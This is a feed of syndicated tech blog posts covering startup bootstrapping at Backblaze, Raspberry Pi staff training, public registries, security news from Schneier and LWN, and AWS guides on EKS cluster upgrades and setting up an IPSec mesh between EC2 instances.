Bootstrapping to $30 Million ARR

Post Syndicated from Yev original https://www.backblaze.com/blog/startup-tips-bootstrapping-to-30-million-arr/

Backblaze Billboard on Highway 101 in Silicon Valley, 2011
Backblaze will be celebrating its 12th year in business this coming April 20th. We’ve steadily grown over the years, and this year have reached $30 million ARR (annual recurring revenue). We’ve accomplished this with only $3.1 million in funding over the years, having successfully bootstrapped the company with founder contributions and cash flow since the very beginning.

Last year our CEO and co-founder Gleb Budman wrote a series of posts on entrepreneurship that detailed our early years and some lessons learned that entrepreneurs can apply for themselves.

Recently, Gleb did a follow-on webinar on BrightTALK covering many of the series’ main points.
Given the time constraints most entrepreneurs face, I’ll highlight what I consider some of the key lessons for startups that Gleb outlined in both the entrepreneurial series and the webinar.

Gleb Budman on BrightTALK Founders Series

Gleb’s webinar on BrightTALK

Creating Your Product

Gleb’s first article, How Backblaze Got Started: The Problem, The Solution, and the Stuff In-Between, starts with one of the most critical aspects for any successful company: defining the real problem you’re trying to solve. In Gleb’s words, “The entrepreneur builds things to solve problems — your own or someone else’s.”

So the question is: how do you go about defining the problem? The most obvious place to start is to look at the pain points you’re trying to address and then define the specific elements that contribute to them. Can you solve the problem by taking away or changing one or more of those elements? Or is it a matter of adding new elements to shift away the pain points?

In our case, there was an obvious need in the market for backing up computers. Solutions that, at least in theory, addressed that need already existed, yet the majority of people still didn’t use one. The question was why?

Just because solutions exist doesn’t mean the problem is solved. After a series of deep dives into why people weren’t backing up, we discovered that the major problem was that backup solutions were too complicated for most people. They recognized they should be backing up, but weren’t willing to invest the time to learn how to use one of the existing services. So the problem Backblaze was originally solving wasn’t backup in general, it was taking away the learning curve to use a backup solution.

Once you have the problem clearly defined, you can proceed to design a solution that will solve it. Of course the solution itself will likely be defined by market forces, most notably, price. As Gleb touches on in the following video clip, pricing needs to be built into the solution from the outset.

Surviving Your First Year

Once you’ve determined the problem you want to solve, the next step is to create the infrastructure, i.e. the company, in order to build the solution. With that in mind, your primary goals for that first year should be: set up the company correctly, build and launch your minimal viable product, and most importantly, survive.

Setting up the company correctly is critical. A company is only as successful as the people in it. At all stages of growth, it’s critical that people have clear definitions of what is expected of them, but in the beginning it’s especially important to make sure people know what they need to do and the vision that’s driving the business.

From the start you need to determine the company, product, and development resources you need, define roles to be filled, and assign responsibilities once key players start joining your team. It’s very common in the early stages of a startup for everyone to be working on the same tasks in a democratic process. That might be good for morale in the beginning, but can result in a lack of focused direction. Leadership must emerge and help steer the company towards the shared vision. With clearly defined roles and responsibilities, team members can collaborate on achieving specific milestones, ensuring forward momentum.

A far less exciting but equally important foundation for a startup is the legal entity. It’s easy to get caught up in the excitement of building a product and put off the less exciting legal aspects until you are ready to launch. However, trying to retroactively get all the legal requirements in place is far more difficult.

Ownership (equity) ratios need to be locked in near the start of the company. Having this hammered out early can avoid a lot of potential infighting down the line. If you plan on raising money, you will need to incorporate and issue stock. You may also want to create a Proprietary Information and Inventions Assignment (PIIA) document, which states that what you are all working on is owned by the company.

Once the (admittedly not terribly exciting) legal aspects are taken care of, the focus truly shifts to building your minimal viable product (MVP) and launching it. It’s natural to want to build the perfect product, but in today’s market it’s better to focus on what you think are the most important features and launch. As Gleb writes in Surviving Your First Year, “Launching forces a scoping of the feature set to what’s critical, rallies the company around a goal, starts building awareness of your company and solution, and pushes forward the learning process.” Once you launch your MVP, you’ll start receiving feedback and then the iteration process can start: more on that later.

Lastly, when it comes to surviving your first year, always make an effort to conserve your cash. It might be tempting to scale as quickly as you can by hiring a lot more employees and building out your infrastructure, but minimizing your burn rate is usually more important for long term success. For example, Backblaze spent only $94k to build and launch its beta online backup service. If you scale your startup’s people and infrastructure too fast, you might have to rush to find more funding, which typically means more dilution and more outsiders telling you what you should be doing — not great when you’re first starting out and trying to achieve your vision.

Gleb goes into more detail in this video clip:

Getting Your First Customers

When you’re finally ready to go, you should target people who will give you lots of feedback as your first customers. Often, this means friends and even family members that are willing to give you their opinions on what you’re doing. It’s important to press the people close to you to give you honest feedback, as sugar-coating comments might actually lead you to make incorrect conclusions about your product.

Once you have a chance to evaluate the initial feedback and iterate on it, consider a private beta launch. Backblaze’s initial launch target was to get 1,000 people to use the service. In his article, How to Get Your First 1,000 Customers, Gleb goes into detail on how Backblaze successfully used PR outreach to achieve the beta launch goal.

One of the PR tactics used was to give publications, such as Techcrunch, ArsTechnica, and SimpleHelp, a limited number of beta invites. This not only raised awareness, but it gave early beta users a feeling of exclusivity, which helped in getting beta users to provide honest feedback.

Equally important is to have a system in place to collect contact information from everyone that expresses interest, even if you can’t service them at the time. You always want to be building your customer pipeline and having mechanisms in place to collect leads is important for sustained growth.

Startup Highs and Lows

It’s unavoidable that every startup entrepreneur will face a number of unexpected lows that can overshadow what seem like increasingly infrequent highs. Dealing with both is vital to sustaining your business (and your mental health). Oftentimes, what at first appears to be a low point can inspire actions that ultimately help drive your business to new highs.

In the following clip Gleb gives several examples of seemingly low points that Backblaze was ultimately able to turn into wins, or as Gleb says “turning lemons into lemonade.” Note: I recently wrote a post about similar turnarounds on the social media front, Making Lemonade: The Importance of Social Media and Community.

Building Culture

It might not be foremost in your mind at the start, but from day one of your startup you are building your company culture. Culture is a little more nebulous than product design (maybe a lot more nebulous), but it is equally important in the long run. Culture affects every aspect of how your company operates because it has a day to day effect on every employee and the decisions they make, as Gleb points out in this short clip.

A prime example of how company culture affects your business is Backblaze’s emphasis on transparency. One of the first major wins for Backblaze was the release of our first Storage Pod design back in 2009. Most companies would keep proprietary design IP (intellectual property), like the Storage Pod, under lock and key, because they provide a major competitive pricing advantage. Yet the cultural importance of transparency led to a decision to open source the Storage Pod design despite the risk of competitors taking the designs and copying them. It also enabled us to answer a common question, “How can you provide this service at this low a price?” by writing one blog post with specifications, photos, and a parts inventory showing exactly how we do it.

The result of that very risky decision was a massive increase in brand awareness. Hundreds of articles were written about Backblaze, including not just general-interest and news pieces, but also business case studies examining the rare decision to be so transparent about our IP.

All of this attention ultimately positioned Backblaze as a thought leader in the cloud backup space (later, also in cloud storage), allowing us to be mentioned in the same articles and to compete against far bigger companies, including Amazon, Google, and Microsoft.

I hope you enjoyed this TL;DR version of Gleb’s entrepreneurial series and would love to hear your thoughts in the comments section below. I highly encourage anyone involved in a startup to read the original series as time permits and to watch the entire webinar on BrightTALK, Founders Spotlight: Gleb Budman, CEO, Backblaze.

Gleb Budman’s Series on Entrepreneurship on the Backblaze Blog:

  1. How Backblaze got Started: The Problem, The Solution, and the Stuff In-Between
  2. Building a Competitive Moat: Turning Challenges Into Advantages
  3. From Idea to Launch: Getting Your First Customers
  4. How to Get Your First 1,000 Customers
  5. Surviving Your First Year
  6. How to Compete with Giants
  7. The Decision on Transparency
  8. Early Challenges: Managing Cash Flow
  9. Early Challenges: Making Critical Hires

The post Bootstrapping to $30 Million ARR appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Staff Picademy and the sacrificial Babbage

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/staff-picademy-and-the-sacrificial-babbage/

Refill the coffee machine, unpack the sacrificial Babbages, and refresh the micro SD cards — it’s staff Picademy time!

Raspberry Pi Staff Picademy

Staff Picademy

Once a year, when one of our all-staff meetings brings together members of the Raspberry Pi team from across the globe, we host staff Picademy at our office. It’s two days of making and breaking where the coding-uninitiated — as well as the more experienced people! — are put through their paces and rewarded with Raspberry Pi Certified Educator status at the end.

Lest we forget the sacrificial Babbages and all they have done in the name of professional development

What is Picademy?

Picademy is our free two-day professional development programme where educators come together to gain knowledge and confidence in digital making and computing. On Day 1, you learn new skills; on Day 2, you put your learning to the test by finding some other participants and creating a project together, from scratch!

Our Picademy events in the United Kingdom and in North America have hosted more than 2000 Raspberry Pi Certified Educators, who have gone on to create after-school coding clubs, makerspaces, school computing labs, and other amazing things to increase the accessibility of computing and digital making for tens of thousands of young people.

Why do we run staff Picademy?

Because we stand by what we preach: we believe in learning through making, and we want our staff to be able to attend events, volunteer at Picademy, Code Clubs, CoderDojos, and Raspberry Jams, and feel confident in what they say and do.

And also, because Picademy is really fun!

Stuff and things, bits and bobs: staples of any good Picademy

You don’t need to be techy to work at Raspberry Pi: we’re not all engineers. Our staff ranges from educators and web developers to researchers, programme managers, administrators, and accountants. And we think everyone should give coding a shot, so we love getting our staff together to allow them to explore a new skill — and have some fun in the process.

I *think* this has something to do with The MagPi and a Christmas tree?

At our staff Picademy events, we’ve made everything from automated rock bands out of tin foil to timelapse buggies, and it really is a wonderful experience to see people come together and, within two days, take a skillset that may be completely new to them and use it to create a fully working, imaginative project.

Timelapse buggy is a thing of beauty…as is Brian

Your turn

If you’re an educator looking to try something new in your classroom, keep an eye on our channels, because we’ll be announcing dates for Picademy 2019 soon. You will find them on the Picademy page and see them pop up if you follow the #Picademy tag on Twitter. We’ll also announce the dates and locations in our Raspberry Pi LEARN newsletter, so be sure to sign up.

And if you’d like to join the Raspberry Pi team and build something silly and/or amazing at next year’s staff Picademy, we have roles available in the UK, Ireland, and North America.

The post Staff Picademy and the sacrificial Babbage appeared first on Raspberry Pi.

Without Registries Comes Chaos

Post Syndicated from Bozho original https://blog.bozho.net/blog/3245

We often realize how important something is only once it is gone. Such was the case with the Commercial Register: we had grown used to everything being available online, to being able to check a company’s current status without carrying paper certificates around, and to filing documents online to register a company or record changes in its circumstances.

Then, in August, the register went down for more than two weeks. It turned out that deals could not be completed and that some companies could not pay salaries. Commercial activity did not stop, but it was hampered by the register’s absence.

The register “survived” and left us with an important lesson: public registries are extremely important, and their absence creates chaos. The Commercial Register is one of the most important, but it is far from the only one. Other registries that are key for the state include the national “Population” database maintained by GD GRAO, the property register, the cadastre, the vehicle register, the register of special pledges, the credit register, the public procurement register, and the register of shareholders at the Central Depository. And there are hundreds more sectoral registries, large and small: in healthcare, in justice, in tourism, and so on.

These registries are not merely a consequence of the state’s desire to control every aspect of public life. To a large extent they contribute to more transparency and greater peace of mind for everyone involved. The Commercial Register, for example, guarantees that we are doing business with the real representatives of a given company. The property register lets us know the full history of a property. The vehicle register enables (even if inefficiently implemented at the moment) enforcement of traffic rules and thus the safety of road users. The credit register allows banks to make better assessments of their borrowers. The population register, in turn, is a prerequisite for any e-government at all.

A considerable share of these registries is still kept on paper as well, but in the long run paper will go away. This means that maintaining the digital infrastructure is becoming an ever more important task. Unfortunately, many of these registries have significant problems: with maintenance, with architecture, with security, and with transparency.

By all appearances, the Commercial Register “went down” because its maintenance was managed extremely poorly. Other registries are built in a way that does not anticipate heavy load, of the kind a working e-government would generate. The security of the data in the registries is also questionable: is the data encrypted, who has access, who can modify data, and does that leave a trace? Last but not least is transparency: the registries are nominally electronic, yet they do not publish enough information, or they provide it in an overly inconvenient and bureaucratic way.

There are regulations (laws and ordinances), strategies, and projects aimed at solving all of these problems. But we could not say that things are improving. In cases like that of the Commercial Register they may even be getting worse: a crash this serious happened for the first time.

Ultimately, the problem is rooted not simply in the expertise the state lacks, or in its inability to control and make use of the external expertise it buys. The problem is the failure, at the political and management level, to understand how important and critical these registries are.

A registry is not just a notebook with a few columns, which is probably how many people imagine it, nor even a simple database with a few fields. Registries are a complex system of data and processes, of software and hardware; a system in which current good practices must be applied and which needs constant modernization.

Registries, or at least some of them, are necessary both for e-government and for civil and commercial life. Neglecting and misunderstanding them is a problem with no trivial solution.

(This article was originally published in Мениджър magazine.)

Marriott Hack Reported as Chinese State-Sponsored

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/12/marriott_hack_r.html

The New York Times and Reuters are reporting that China was behind the recent hack of Marriott Hotels. Note that this is still unconfirmed, but it is interesting if true.

Reuters:

Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company’s private probe into the attack.

That suggests that Chinese hackers may have been behind a campaign designed to collect information for use in Beijing’s espionage efforts and not for financial gain, two of the sources said.

While China has emerged as the lead suspect in the case, the sources cautioned it was possible somebody else was behind the hack because other parties had access to the same hacking tools, some of which have previously been posted online.

Identifying the culprit is further complicated by the fact that investigators suspect multiple hacking groups may have simultaneously been inside Starwood’s computer networks since 2014, said one of the sources.

I used to have opinions about whether these attributions are true or not. These days, I tend to wait and see.

Making Cluster Updates Easy with Amazon EKS

Post Syndicated from Brandon Chavis original https://aws.amazon.com/blogs/compute/making-cluster-updates-easy-with-amazon-eks/

Kubernetes is rapidly evolving, with frequent feature releases, functionality updates, and bug fixes. Additionally, AWS periodically changes the way it configures Amazon Elastic Container Service for Kubernetes (Amazon EKS) to improve performance, support bug fixes, and enable new functionality. Previously, moving to a new Kubernetes version required you to re-create your cluster and migrate your applications. This is a time-consuming process that can result in application downtime.

Today, I’m excited to announce that EKS now performs managed, in-place cluster upgrades for both Kubernetes and EKS platform versions. This simplifies cluster operations and lets you quickly take advantage of the latest Kubernetes features, as well as the updates to EKS configuration and security patches, without any downtime. EKS also now supports Kubernetes version 1.11.5 for all new EKS clusters.

Updates for Kubernetes and EKS

There are two types of updates that you can apply to your EKS cluster: Kubernetes version updates and EKS platform version updates. Today, EKS supports upgrades between Kubernetes minor versions 1.10 and 1.11.

As new Kubernetes versions are released and validated for use with EKS, we will support three stable Kubernetes versions as part of the update process at any given time.

EKS platform versions

The EKS platform version contains Kubernetes patches and changes to the API server configuration. Platform versions are separate from but associated with Kubernetes minor versions.

When a new Kubernetes version is made available for EKS, its initial control plane configuration is released as the “eks.1” platform version. AWS releases new platform versions as needed to enable Kubernetes patches. AWS also releases new versions when there are EKS API server configuration changes that could affect cluster behavior.

Using this versioning scheme makes it possible to independently update the configuration of different Kubernetes versions. For example, AWS might need to release a patch for Kubernetes version 1.10 that is incompatible with Kubernetes version 1.11.

Currently, platform version updates are automatic. AWS plans to provide manual control over platform version updates through the UpdateClusterVersion API operation in the future.

Using the update API operations

There are three new EKS API operations to enable cluster updates:

  • UpdateClusterVersion
  • ListUpdates
  • DescribeUpdates

The UpdateClusterVersion operation can be used through the AWS CLI to start a cluster update between Kubernetes minor versions:

aws eks update-cluster-version --name Your-EKS-Cluster --kubernetes-version 1.11

You only need to pass in a cluster name and the desired Kubernetes version. You do not need to pick a specific patch version for Kubernetes. We pick patch versions that are stable and well-tested. This CLI command returns an “update” API object with several important pieces of information:

{
    "update" : {
        "updateId" : UUID,
        "updateStatus" : PENDING,
        "updateType" : VERSION-UPDATE,
        "createdAt" : Timestamp
    }
}

This update object lets you track the status of your requested modification to your cluster. It can show you whether there was an error due to a misconfiguration on your cluster, and whether the update is in progress, completed, or failed.
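
If you prefer to drive the same workflow from code, here is a minimal sketch using the AWS SDK for Python (boto3). The cluster name and region are placeholders, and the response fields follow the SDK’s Update shape ("id", "status"), which differs slightly from the illustrative output shown above:

import time

import boto3

eks = boto3.client("eks", region_name="us-west-2")

# Start the version update (equivalent to `aws eks update-cluster-version`).
update_id = eks.update_cluster_version(
    name="Your-EKS-Cluster",   # placeholder cluster name
    version="1.11",
)["update"]["id"]

# Poll until the update leaves the InProgress state.
while True:
    update = eks.describe_update(name="Your-EKS-Cluster", updateId=update_id)["update"]
    if update["status"] != "InProgress":
        break
    time.sleep(30)

print("Update finished with status:", update["status"])
if update["status"] == "Failed":
    print("Errors:", update.get("errors", []))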

You can also list and describe the status of the update independently, using the following operations:

aws eks list-updates --name Your-EKS-Cluster

This returns the in-flight updates for your cluster:

{
    "updates" : [
        "UUID-1",
        "UUID-2"
    ],
    "nextToken" : null
}

Finally, you can also describe a particular update to see details about the update’s status:

aws eks describe-update --name Your-EKS-Cluster --update-id UUID

{
    "update" : {
        "updateId" : UUID,
        "updateStatus" : FAILED,
        "updateType" : VERSION-UPDATE,
        "createdAt" : Timestamp,
        "error": {
            "errorCode" : DependentResourceNotFound,
            "errorMessage" : The Role used for creating the cluster is deleted.,
            "resources" : ["aws:iam:arn:role"]
        }
    }
}

Considerations when updating

New Kubernetes versions introduce significant changes. I highly recommend that you test the behavior of your application against a new Kubernetes version before performing the update on a production cluster.

Generally, I recommend integrating EKS into your existing CI workflow to test how your application behaves on a new version before updating your production clusters.

Worker node updates

Today, EKS does not update your Kubernetes worker nodes when you update the EKS control plane. You are responsible for updating EKS worker nodes. You can find an overview of this process in Worker Node Updates.

The EKS team releases a set of EKS-optimized AMIs for worker nodes that correspond with each version of Kubernetes supported by EKS. You can find these AMIs listed in the documentation, and you can find the build configuration in a version-specific branch of the Amazon-EKS-AMI GitHub repository.

Getting started

You can start using Kubernetes version 1.11 today for all new EKS clusters. Use cluster updates to move to version 1.11 for all existing EKS clusters. You can learn more about the update process and APIs in our documentation.

New podcast: VP of Security answers your compliance and data privacy questions

Post Syndicated from Katie Doptis original https://aws.amazon.com/blogs/security/new-podcast-vp-of-security-answers-your-compliance-and-data-privacy-questions/

Does AWS comply with X program? How about GDPR? What about after Brexit? And what happens with machine learning data?

In the latest AWS Security & Compliance Podcast, we sit down with VP of Security Chad Woolf, who answers your compliance and data privacy questions. Including one of the most frequently asked questions from customers around the world, which is: how many compliance programs does AWS have/attest to/audit against?

Chad also shares what it was like to work at AWS in the early days. When he joined, AWS was housed on just a handful of floors, in a single building. Over the course of nearly nine years with the company, he has witnessed tremendous growth of the business and industry.

Listen to the podcast and hear about company history and get answers to your tough questions. If you have a compliance or data privacy question, you can submit it through our contact us form.

Want more AWS news? Follow us on Twitter.

[$] DMA and get_user_pages()

Post Syndicated from jake original https://lwn.net/Articles/774411/rss

In the RDMA microconference of the 2018 Linux Plumbers Conference (LPC), John Hubbard, Dan Williams, and Matthew Wilcox led a discussion on the problems surrounding get_user_pages() (and friends) and the interaction with DMA. It is not the first time the topic has come up; there was also a discussion about it at the Linux Storage, Filesystem, and Memory-Management Summit back in April. In a nutshell, the problem is that multiple parts of the kernel think they have responsibility for the same chunk of memory, but they do not coordinate their activities; as might be guessed, mayhem can sometimes ensue.

The x32 subarchitecture may be removed

Post Syndicated from corbet original https://lwn.net/Articles/774734/rss

The x32 subarchitecture is a software variant of x86-64; it runs the processor in the 64-bit mode, but uses 32-bit pointers and arithmetic. The idea is to get the advantages of x86-64 without the extra memory usage that goes along with it. It seems, though, that x32 is not much appreciated; few distributions support it and the number of users appears to be small. So now Andy Lutomirski is proposing its eventual removal:

I propose that we make CONFIG_X86_X32 depend on BROKEN for a release
or two and then remove all the code if no one complains. If anyone
wants to re-add it, IMO they’re welcome to do so, but they need to do
it in a way that is maintainable.

If there are x32 users out there, now would be a good time for them to
speak up.

Security updates for Wednesday

Post Syndicated from ris original https://lwn.net/Articles/774731/rss

Security updates have been issued by Arch Linux (chromium, firefox, lib32-openssl, lib32-openssl-1.0, openssl, openssl-1.0, texlive-bin, and wireshark-cli), Fedora (perl), openSUSE (pdns), Oracle (kernel), Red Hat (kernel), Slackware (mozilla), SUSE (kernel, postgresql10, qemu, and xen), and Ubuntu (firefox, freerdp, freerdp2, pixman, and poppler).

New Australian Backdoor Law

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/12/new_australian_.html

Last week, Australia passed a law giving the government the ability to demand backdoors in computers and communications systems. Details are still to be defined, but it’s really bad.

Note: Many people e-mailed me to ask why I haven’t blogged this yet. One, I was busy with other things. And two, there’s nothing I can say that I haven’t said many times before.

If there are more good links or commentary, please post them in the comments.

EDITED TO ADD (12/13): The Australian government response is kind of embarrassing.

Creating an opportunistic IPSec mesh between EC2 instances

Post Syndicated from Vesselin Tzvetkov original https://aws.amazon.com/blogs/security/creating-an-opportunistic-ipsec-mesh-between-ec2-instances/

IPSec diagram

IPSec (IP Security) is a protocol for in-transit data protection between hosts. Configuration of site-to-site IPSec between multiple hosts can be an error-prone and intensive task. If you need to protect N EC2 instances, then you need a full mesh of N*(N-1) IPSec tunnels. You must manually propagate every IP change to all instances, configure credentials and configuration changes, and integrate monitoring and metrics into the operation. The efforts to keep the full-mesh parameters in sync are enormous.
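
To get a sense of how quickly that grows, here is a quick back-of-the-envelope calculation in Python using the N*(N-1) figure above:

        # Tunnel configurations to manage in a full mesh of N hosts, per the N*(N-1) figure above.
        for n in (5, 10, 50, 100):
            print(f"{n:4d} instances -> {n * (n - 1):6d} tunnel configurations")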

Full mesh IPSec, known as any-to-any, builds an underlying network layer that protects application communication. Common use cases are:

  • You’re migrating legacy applications to AWS, and they don’t support encryption. Examples of protocols without encryption are File Transfer Protocol (FTP), Hypertext Transfer Protocol (HTTP) or Lightweight Directory Access Protocol (LDAP).
  • You’re offloading protection to IPSec to take advantage of fast Linux kernel encryption and automated certificate management, the use case we focus on in this solution.
  • You want to segregate duties between your application development and infrastructure security teams.
  • You want to protect container or application communication that leaves an EC2 instance.

In this post, I’ll show you how to build an opportunistic IPSec mesh that sets up dynamic IPSec tunnels between your Amazon Elastic Compute Cloud (EC2) instances. IPSec is based on Libreswan, an open-source project implementing opportunistic IPSec encryption (IKEv2 and IPSec) on a large scale.

Solution benefits and deliverable

The solution delivers the following benefits (versus manual site-to-site IPSec setup):

  • Automatic configuration of opportunistic IPSec upon EC2 launch.
  • Generation of instance certificates and weekly re-enrollment.
  • IPSec Monitoring metrics in Amazon CloudWatch for each EC2 instance.
  • Alarms for failures via CloudWatch and Amazon Simple Notification Service (Amazon SNS).
  • An initial generation of a CA root key if needed, including IAM Policies and two customer master keys (CMKs) that will protect the CA key and instance key.

Out of scope

This solution does not deliver IPSec protection between EC2 instances and on-premises hosts, or between EC2 instances and managed AWS components like Elastic Load Balancing, Amazon Relational Database Service, or Amazon Kinesis. Your EC2 instances must have general IP connectivity to each other, as permitted by your network ACLs and security groups. This solution cannot deliver extra connectivity the way VPC peering or Transit VPC can.

Prerequisites

You’ll need the following resources to deploy the solution:

  • A trusted Unix/Linux/MacOS machine with AWS SDK for Python and OpenSSL
  • AWS admin rights in your AWS account (including API access)
  • AWS Systems Manager on EC2
  • Linux RedHat, Amazon Linux 2, or CentOS installed on the EC2 instances you want to configure
  • Internet access on the EC2 instances for downloading Linux packages and reaching AWS Systems Manager endpoint
  • The AWS services used by the solution, which are AWS Lambda, AWS Key Management Service (AWS KMS), AWS Identity and Access Management (IAM), AWS Systems Manager, Amazon CloudWatch, Amazon Simple Storage Service (Amazon S3), and Amazon SNS

Solution and performance costs

My solution does not incur charges beyond standard AWS service usage, since it uses well-established open source software. The AWS services involved are as follows:

  • AWS Lambda is used to issue the certificates. Per EC2 instance per week, I estimate two 30-second Lambda invocations with 256 MB of allocated memory. For 100 EC2 instances, the cost will be several cents. See AWS Lambda Pricing for details.
  • Certificates have no charge, since they’re issued by the Lambda function.
  • CloudWatch Events and Amazon S3 Storage usage are within the free tier policy.
  • AWS Systems Manager has no additional charge.
  • AWS EC2 is a standard AWS service on which you deploy your workload. There are no charges for IPSec encryption.
  • EC2 CPU performance decrease due to encryption is negligible since we use hardware encryption support of the Linux kernel. The IKE negotiation that is done by the OS in your CPU may add minimal CPU overhead depending on the number of EC2 instances involved.

Installation (one-time setup)

To get started, on a trusted Unix/Linux/MacOS machine that has admin access to your AWS account and AWS SDK for Python already installed, complete the following steps:

  1. Download the installation package from https://github.com/aws-quickstart/quickstart-ec2-ipsec-mesh.
  2. Edit the following files in the package to match your network setup:
    • config/private should contain all networks with mandatory IPSec protection, such as EC2s that should only be communicated with via IPSec. All of these hosts must have IPSec installed.
    • config/clear should contain any networks that do not need IPSec protection. For example, these might include Route 53 (DNS), Elastic Load Balancing, or Amazon Relational Database Service (Amazon RDS).
    • config/clear-or-private should contain networks with optional IPSec protection. These networks will start clear and attempt to add IPSec.
    • config/private-or-clear should also contain networks with optional IPSec protection. However, these networks will start with IPSec and fail back to clear.
  3. Execute ./aws_setup.py and carefully set and verify the parameters. Use -h to view help. If you don’t provide customized options, default values will be generated. The parameters are:
    • Region to install the solution (default: your AWS Command Line Interface region)
    • Buckets for configuration, sources, published host certificates and CA storage. (Default: random values that follow the pattern ipsec-{hostcerts|cacrypto|sources}-{stackname} will be generated.) If the buckets do not exist, they will be automatically created.
    • Reuse of an existing CA? (default: no)
    • Leave encrypted backup copy of the CA key? The password will be printed to stdout (default: no)
    • Cloud formation stackname (default: ipsec-{random string}).
    • Restrict provisioning to certain VPC (default: any)

     
    Here is an example output:

    
                ./aws_setup.py  -r ca-central-1 -p ipsec-host-v -c ipsec-crypto-v -s ipsec-source-v
                Provisioning IPsec-Mesh version 0.1
                
                Use --help for more options
                
                Arguments:
                ----------------------------
                Region:                       ca-central-1
                Vpc ID:                       any
                Hostcerts bucket:             ipsec-host-v
                CA crypto bucket:             ipsec-crypto-v
                Conf and sources bucket:      ipsec-source-v
                CA use existing:              no
                Leave CA key in local folder: no
                AWS stackname:                ipsec-efxqqfwy
                ---------------------------- 
                Do you want to proceed ? [yes|no]: yes
                The bucket ipsec-source-v already exists
                File config/clear uploaded in bucket ipsec-source-v
                File config/private uploaded in bucket ipsec-source-v
                File config/clear-or-private uploaded in bucket ipsec-source-v
                File config/private-or-clear uploaded in bucket ipsec-source-v
                File config/oe-cert.conf uploaded in bucket ipsec-source-v
                File sources/enroll_cert_lambda_function.zip uploaded in bucket ipsec-source-v
                File sources/generate_certifcate_lambda_function.zip uploaded in bucket ipsec-source-v
                File sources/ipsec_setup_lambda_function.zip uploaded in bucket ipsec-source-v
                File sources/cron.txt uploaded in bucket ipsec-source-v
                File sources/cronIPSecStats.sh uploaded in bucket ipsec-source-v
                File sources/ipsecSetup.yaml uploaded in bucket ipsec-source-v
                File sources/setup_ipsec.sh uploaded in bucket ipsec-source-v
                File README.md uploaded in bucket ipsec-source-v
                File aws_setup.py uploaded in bucket ipsec-source-v
                The bucket ipsec-host-v already exists
                Stack ipsec-efxqqfwy creation started. Waiting to finish (ca 3-5 min)
                Created CA CMK key arn:aws:kms:ca-central-1:123456789012:key/abcdefgh-1234-1234-1234-abcdefgh123456
                Certificate generation lambda arn:aws:lambda:ca-central-1:123456789012:function:GenerateCertificate-ipsec-efxqqfwy
                Generating RSA private key, 4096 bit long modulus
                .............................++
                .................................................................................................................................................................................................................................................................................................................................................................................++
                e is 65537 (0x10001)
                Certificate and key generated. Subject CN=ipsec.ca-central-1 Valid 10 years
                The bucket ipsec-crypto-v already exists
                Encrypted CA key uploaded in bucket ipsec-crypto-v
                CA cert uploaded in bucket ipsec-crypto-v
                CA cert and key remove from local folder
                Lambda functionarn:aws:lambda:ca-central-1:123456789012:function:GenerateCertificate-ipsec-efxqqfwy updated
                Resource policy for CA CMK hardened - removed action kms:encrypt
                
                done :-)
            

Launching the EC2 Instance

Now that you’ve installed the solution, you can start launching EC2 instances. From the EC2 Launch Wizard, execute the following steps. The instructions assume that you’re using RedHat, Amazon Linux 2, or CentOS.

Note: Steps or details that I don’t explicitly mention can be set to default (or according to your needs).

  1. Select the IAM Role already configured by the solution with the pattern Ec2IPsec-{stackname}
     
    Figure 1: Select the IAM Role

    Figure 1: Select the IAM Role

  2. (You can skip this step if you are using Amazon Linux 2.) Under Advanced Details, select User data as text and activate the AWS Systems Manager Agent (SSM Agent) by providing the following string (for RedHat and CentOS 64 Bits only):
    
        #!/bin/bash
        sudo yum install -y https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm-agent.rpm
        sudo systemctl start amazon-ssm-agent
        

     

    Figure 2: Select User data as text and activate the AWS Systems Manager Agent

    Figure 2: Select User data as text and activate the AWS Systems Manager Agent

  3. Set the tag name to IPSec with the value todo. This is the identifier that triggers the installation and management of IPsec on the instance.
     
    Figure 3: Set the tag name to "IPSec" with the value "todo"

    Figure 3: Set the tag name to “IPSec” with the value “todo”

  4. On the Configuration page for the security group, allow ESP (Protocol 50) and IKE (UDP 500) for your network, like 172.31.0.0/16. You need to enter these values as shown in the following screen (a programmatic sketch of the same rules follows this list):
     
    Figure 4: Enter values on the "Configuration" page

    Figure 4: Enter values on the “Configuration” page
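
If you script your environment instead of using the console, the same two rules can be added with boto3. This is only a sketch; the security group ID and CIDR below are placeholders for your own values:

        # Sketch: allow IKE (UDP 500) and ESP (IP protocol 50) for your VPC network.
        import boto3

        ec2 = boto3.client("ec2")
        ec2.authorize_security_group_ingress(
            GroupId="sg-0123456789abcdef0",  # placeholder security group
            IpPermissions=[
                {   # IKE negotiation
                    "IpProtocol": "udp",
                    "FromPort": 500,
                    "ToPort": 500,
                    "IpRanges": [{"CidrIp": "172.31.0.0/16"}],
                },
                {   # ESP (IP protocol number 50); no ports apply
                    "IpProtocol": "50",
                    "IpRanges": [{"CidrIp": "172.31.0.0/16"}],
                },
            ],
        )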

After 1-2 minutes, the value of the IPSec instance tag will change to enabled, meaning the instance is successfully set up.
 

Figure 5: Look for the "enabled" value for the IPSec key

Figure 5: Look for the “enabled” value for the IPSec key

So what’s happening in the background?

 

Figure 6: Architectural diagram

Figure 6: Architectural diagram

As illustrated in the solution architecture diagram, the following steps are executed automatically in the background by the solution:

  1. An EC2 launch triggers a CloudWatch event, which launches an IPSecSetup Lambda function.
  2. The IPSecSetup Lambda function checks whether the EC2 instance has the tag IPSec:todo. If the tag is present, the Lambda function issues a certificate calling a GenerateCertificate Lambda.
  3. The GenerateCertificate Lambda function downloads the encrypted CA certificate and key.
  4. The GenerateCertificate Lambda function decrypts the CA key with a customer master key (CMK).
  5. The GenerateCertificate Lambda function issues a host certificate to the EC2 instance. It encrypts the host certificate and key with a KMS generated random secret in PKCS12 structure. The secret is envelope-encrypted with a dedicated CMK.
  6. The GenerateCertificate Lambda function publishes the issued certificates to your dedicated bucket for documentation.
  7. The IPSec Lambda function calls and runs the installation via SSM.
  8. The installation downloads the configuration and installs python, aws-sdk, libreswan, and curl if needed.
  9. The EC2 instance decrypts the host key with the dedicated CMK and installs it in the IPSec database.
  10. A weekly scheduled event triggers reenrollment of the certificates via the Reenrollcertificates Lambda function.
